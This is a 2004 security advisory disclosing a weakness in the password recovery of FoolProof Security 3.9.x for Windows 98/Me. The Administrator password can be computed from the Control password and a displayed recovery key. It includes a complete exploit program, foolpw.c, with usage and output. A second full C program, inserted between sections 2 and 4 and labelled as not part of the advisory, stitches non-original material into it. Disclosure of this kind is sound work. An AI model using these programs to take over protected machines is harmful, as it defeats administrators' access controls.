CYSA-0329.txt
Posted Jun 9, 2004
Authored by Cyrillium Security Solutions and Services | Site cyrillium.com

Cyrillium Security Advisory CYSA-0329 - FoolProof Security 3.9.x for Windows 98/98SE/Me has a vulnerability in the password recovery functionality that allows an attacker to recover the Administrator password using the Control password and password recovery key. Exploit included.

tags | exploit
systems | windows
SHA-256 | 4ade30b5e97e6f4843b28db0bf163827d80893b19b977412fad14285f512eece

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Cyrillium Security Advisory CYSA-0329 advisories@cyrillium.com
http://www.cyrillium.com/ Cyrillium Security Solutions and Services
April 29th, 2004
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Severity: High (Password Compromise)

Vendor:
SmartStuff Software (member of Riverdeep Interactive Learning, Inc.)

Affected Products:
FoolProof Security 3.9.x for Windows 98/98SE/Me

Unaffected Products:
FoolProof Security for Macintosh
FoolProof Security for Windows XP and Windows 2000

1. Problem Description

Cyrillium Security Solutions and Services has discovered a vulnerability in the password recovery feature of FoolProof Security that allows an attacker to recover the "Administrator" password using the "Control" password and password recovery key.

FoolProof for Macintosh and FoolProof for Windows XP & 2000 are not affected because they do not support the password recovery feature.

2. Details

Passwords are stored as 16-byte, zero-padded ASCII strings. When FoolProof Security is installed, an "Administrator" password must be specified. Either the "Administrator" password or the "Control" password may be used to access the FoolProof control panel and to bypass the Bootlock and Keylock protection features. If the "Control" password is forgotten or compromised, the "Administrator" password can be used either to enter the FoolProof control panel and change the "Control" password, or to determine the "Control" password from the password recovery key.

The password recovery key is a 32-character hexadecimal string that can be obtained by holding down the Shift key and pressing "OK" in the FoolProof control panel's initial password dialog box. The ADMINPW.EXE program on the FoolProof Security installation diskette calculates the "Control" password from the "Administrator" password and the password recovery key.

The ADMINPW.EXE program combines the zero-padded "Administrator" password with the password recovery key using the bitwise exclusive OR (XOR) operation. Next, the 16-byte ASCII string "D:SKFOIJ@(*EHJFL" is subtracted from the previous result, one byte at a time, with each byte computed modulo 256 (as the exploit program in section 4 does). The final result is the "Control" password.

If C represents the "Control" password, A represents the "Administrator" password, B represents the ASCII string "D:SKFOIJ@(*EHJFL", and K represents the password recovery key, then the ADMINPW.EXE algorithm is:
C = (A xor K) - B
Because byte-wise subtraction modulo 256 is undone by byte-wise addition modulo 256, and XOR with a fixed value is its own inverse, rearranging the formula yields:
A = (C + B) xor K
Thus, the "Administrator" password can be calculated if the "Control" password and password recovery key are known.

The password recovery key is trivial to obtain by holding down the Shift key and pressing "OK" in the FoolProof control panel's initial password dialog box. If the "Control" password is compromised, the "Administrator" password can be compromised as well.

Example:

Administrator password is "12345":
A = 31 32 33 34 35 00 00 00 00 00 00 00 00 00 00 00 (hexadecimal)
Control password is "HelloWorld":
C = 48 65 6C 6C 6F 57 6F 72 6C 64 00 00 00 00 00 00
Recovery key (reported by FoolProof control panel):
K = BD AD 8C 83 80 A6 B8 BC AC 8C 2A 45 48 4A 46 4C
Offsets (constant):
B = 44 3A 53 4B 46 4F 49 4A 40 28 2A 45 48 4A 46 4C

Recovery process (ADMINPW.EXE algorithm):
A xor K = 8C 9F BF B7 B5 A6 B8 BC AC 8C 2A 45 48 4A 46 4C
(A xor K) - B = 48 65 6C 6C 6F 57 6F 72 6C 64 00 00 00 00 00 00
(A xor K) - B = "HelloWorld" = Control password

Reverse recovery process:
C + B = 8C 9F BF B7 B5 A6 B8 BC AC 8C 2A 45 48 4A 46 4C
(C + B) xor K = 31 32 33 34 35 00 00 00 00 00 00 00 00 00 00 00
(C + B) xor K = "12345" = Administrator password

The "Administrator" password can be successfully determined knowing only the "Control" password and the password recovery key.
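The walk-through above carried through in code, as an added example that is not part of the advisory and is not ADMINPW.EXE: the forward computation ADMINPW.EXE performs, the reverse computation the attack performs, and, as an algebraic consequence the advisory does not spell out (K = (C + B) xor A), the key that makes a given password pair consistent. The constant B and the test vector (A = "12345", C = "HelloWorld", K as reported by the control panel) are taken from the advisory; the function and constant names (fp_*, FP_EXAMPLE_KEY) are this example's own.

```c
/*
 * Added example, not code from the advisory or from ADMINPW.EXE: the
 * CYSA-0329 relation in both directions and the key relation it implies.
 * Function names are this example's own. Byte-wise, modulo 256, over
 * 16-byte zero-padded fields:
 *   C = (A xor K) - B   ADMINPW.EXE: control from administrator and key
 *   A = (C + B) xor K   the attack: administrator from control and key
 *   K = (C + B) xor A   the key consistent with a given (A, C) pair
 */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define FP_LEN 16

/* Constant offsets B = "D:SKFOIJ@(*EHJFL" (from the advisory). */
static const uint8_t FP_B[FP_LEN] = {
    0x44, 0x3A, 0x53, 0x4B, 0x46, 0x4F, 0x49, 0x4A,
    0x40, 0x28, 0x2A, 0x45, 0x48, 0x4A, 0x46, 0x4C
};

/* Recovery key from the advisory's worked example (A="12345", C="HelloWorld"). */
const uint8_t FP_EXAMPLE_KEY[FP_LEN] = {
    0xBD, 0xAD, 0x8C, 0x83, 0x80, 0xA6, 0xB8, 0xBC,
    0xAC, 0x8C, 0x2A, 0x45, 0x48, 0x4A, 0x46, 0x4C
};

/* Zero-pad a password to 16 bytes; returns 0 if it is longer than that. */
static int fp_pad(const char *pw, uint8_t out[FP_LEN])
{
    size_t n = strlen(pw);
    if (n > FP_LEN)
        return 0;
    memset(out, 0, FP_LEN);
    memcpy(out, pw, n);
    return 1;
}

/* ADMINPW.EXE direction: C = (A xor K) - B. */
void fp_control_from_admin(const uint8_t a[FP_LEN], const uint8_t k[FP_LEN],
                           uint8_t c[FP_LEN])
{
    for (int i = 0; i < FP_LEN; i++)
        c[i] = (uint8_t)((a[i] ^ k[i]) - FP_B[i]);
}

/* Attack direction: A = (C + B) xor K. */
void fp_admin_from_control(const uint8_t c[FP_LEN], const uint8_t k[FP_LEN],
                           uint8_t a[FP_LEN])
{
    for (int i = 0; i < FP_LEN; i++)
        a[i] = (uint8_t)((c[i] + FP_B[i]) ^ k[i]);
}

/* K = (C + B) xor A. Wherever both passwords are zero-padded the key byte
 * equals the B byte, which is visible in the advisory's example key. */
void fp_key_from_pair(const uint8_t a[FP_LEN], const uint8_t c[FP_LEN],
                      uint8_t k[FP_LEN])
{
    for (int i = 0; i < FP_LEN; i++)
        k[i] = (uint8_t)((c[i] + FP_B[i]) ^ a[i]);
}

/* String wrapper for the attack: recovers the administrator password into
 * out (NUL-terminated). Returns 0 if control is longer than 16 characters. */
int fp_recover_admin(const char *control, const uint8_t k[FP_LEN],
                     char out[FP_LEN + 1])
{
    uint8_t c[FP_LEN], a[FP_LEN];
    if (!fp_pad(control, c))
        return 0;
    fp_admin_from_control(c, k, a);
    memcpy(out, a, FP_LEN);
    out[FP_LEN] = '\0';
    return 1;
}

/* Returns 1 when the advisory's worked example checks out in all three
 * directions, 0 otherwise. */
int fp_selftest(void)
{
    uint8_t a[FP_LEN], c[FP_LEN], k2[FP_LEN];
    char admin[FP_LEN + 1];
    if (!fp_pad("12345", a))
        return 0;
    fp_control_from_admin(a, FP_EXAMPLE_KEY, c);
    if (memcmp(c, "HelloWorld\0\0\0\0\0\0", FP_LEN) != 0)
        return 0;
    if (!fp_recover_admin("HelloWorld", FP_EXAMPLE_KEY, admin) ||
        strcmp(admin, "12345") != 0)
        return 0;
    fp_key_from_pair(a, c, k2);
    return memcmp(FP_EXAMPLE_KEY, k2, FP_LEN) == 0;
}

int main(void)
{
    char admin[FP_LEN + 1];
    fp_recover_admin("HelloWorld", FP_EXAMPLE_KEY, admin);
    printf("administrator password: %s\n", admin);
    printf("self-test: %s\n", fp_selftest() ? "ok" : "FAILED");
    return 0;
}
```

Compile with any C99 compiler and run; fp_selftest() reproduces the hexadecimal walk-through above byte for byte. What the reverse direction makes concrete is that B is a fixed constant and K is displayed by the control panel on request, so the only secret standing between an attacker and the "Administrator" password is the "Control" password itself.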

4. Exploit

The following program calculates the "Administrator" password from the
password recovery key and the "Control" password.

Usage:

Invoke the program with the following arguments:

foolpw HEXADECIMAL_RECOVERY_KEY CONTROL_PASSWORD

Example:

C:\> foolpw BDAD8C8380A6B8BCAC8C2A45484A464C HelloWorld
12345

Source code:

/*

foolpw.c
Copyright (C) 2004 Cyrillium Security Solutions and Services.

Demonstrates a weakness in FoolProof Security password recovery system. See
CYSA-0329 for details.

CYRILLIUM SECURITY SOLUTIONS AND SERVICES DOES NOT PROVIDE ANY WARRANTY FOR
THIS PROGRAM, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.
SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY
SERVICING, REPAIR OR CORRECTION.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main (int argc, char *argv[])
{
    int i;              /* Index variable */
    char a,             /* Temporary variable for calculations */
         k[33],         /* Recovery key in hexadecimal (32 characters + NUL) */
         k_array[17],   /* Recovery key as a 16-byte array */
         c[17],         /* Control password, zero-padded to 16 bytes */
         *b = "D:SKFOIJ@(*EHJFL", /* Offsets */
         hex_temp[3],   /* One hexadecimal byte (2 characters + NUL) */
         *endptr;       /* Output variable for strtoul */

    if (argc != 3)
    {
        puts ("Usage: foolpw RECOVERY_KEY CONTROL_PASSWORD");
        return 1;
    }
    if (strlen (argv[1]) != 16*2)
    {
        puts ("Recovery key must be 16 hexadecimal bytes (32 characters)");
        return 1;
    }
    if (strlen (argv[2]) > 16)
    {
        puts ("Passwords are limited to 16 characters");
        return 1;
    }
    memset (k, 0, sizeof (k));
    memset (k_array, 0, sizeof (k_array));
    memset (c, 0, sizeof (c));
    memset (hex_temp, 0, sizeof (hex_temp));
    strcpy (k, argv[1]);
    strcpy (c, argv[2]);

    for (i = 0; i < 16; i++)
    {
        /* Convert one pair of hexadecimal digits. hex_temp[2] stays '\0',
           so strtoul cannot read past the two characters copied in. */
        memcpy (hex_temp, &k[i*2], 2);
        k_array[i] = strtoul (hex_temp, &endptr, 16);
        if (*endptr != '\0')
        {
            printf ("\nInvalid hexadecimal character \'%c\'\n", *endptr);
            return 1;
        }
        /* A = (C + B) xor K, one byte at a time (modulo 256) */
        a = (c[i] + b[i]) ^ k_array[i];
        putc (a, stdout);
    }
    puts ("");
    return 0;
}

5. Solution

Users who know the "Administrator" password can enter the FoolProof control panel and bypass Bootlock/Keylock on any computer that has the same "Administrator" password as the compromised computer. To change the "Administrator" password, FoolProof Security must be reinstalled.

Upgrading to FoolProof Security 4.0 or higher is recommended because the password recovery feature has been removed. However, FoolProof versions 4.0 and higher do not support Windows 95, Windows 98, or Windows Me.

Remember to read the uninstallation and upgrade instructions before
upgrading FoolProof Security, especially if you are using
Bootlock/Keylock. Improper uninstallation or upgrading could cause your
computer to fail to boot.

6. References

1. SmartStuff Software: <http://www.smartstuff.com/>
2. Riverdeep Interactive Learning, Inc.: <http://www.riverdeep.net>

7. Copyright

Copyright (C) 2004 Cyrillium Security Solutions and Services. All rights reserved. Permission is granted to redistribute unmodified copies of this advisory.
